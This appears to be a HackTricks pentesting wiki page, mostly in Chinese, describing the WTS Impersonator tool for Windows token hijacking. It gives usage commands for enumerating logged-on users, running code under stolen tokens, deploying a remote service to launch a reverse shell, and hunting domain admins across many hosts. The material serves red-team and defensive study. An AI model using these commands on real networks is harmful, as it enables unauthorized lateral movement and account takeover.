WTS Impersonator

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

WTS Impersonator 工具利用 "\pipe\LSM_API_service" RPC 命名管道，悄悄枚举已登录用户并劫持他们的令牌，绕过传统的令牌模拟技术。这种方法促进了网络内的无缝横向移动。这项技术的创新归功于 Omri Baso，他的工作可以在 GitHub 上访问。

核心功能

该工具通过一系列 API 调用进行操作：

WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken → CreateProcessAsUserW

关键模块和用法

枚举用户：使用该工具可以进行本地和远程用户枚举，使用适合的命令：
本地：

.\WTSImpersonator.exe -m enum

远程，通过指定IP地址或主机名：

.\WTSImpersonator.exe -m enum -s 192.168.40.131

执行命令：exec和exec-remote模块需要服务上下文才能工作。本地执行只需WTSImpersonator可执行文件和一个命令：
本地命令执行示例：

.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe

PsExec64.exe可用于获取服务上下文：

.\PsExec64.exe -accepteula -s cmd.exe

远程命令执行：涉及创建和安装一个远程服务，类似于PsExec.exe，允许以适当的权限执行。
远程执行示例：

.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2

用户猎杀模块：针对多个机器上的特定用户，在他们的凭据下执行代码。这对于针对在多个系统上具有本地管理员权限的域管理员特别有用。
用法示例：

.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe

支持HackTricks

查看订阅计划!
加入 💬 Discord群组或电报群组或在 Twitter 🐦 @hacktricks_live上关注我们。
通过向 HackTricks和HackTricks Cloud GitHub库提交PR分享黑客技巧。

PreviousMimikatz NextBasic Win CMD for Pentesters

Last updated 4 months ago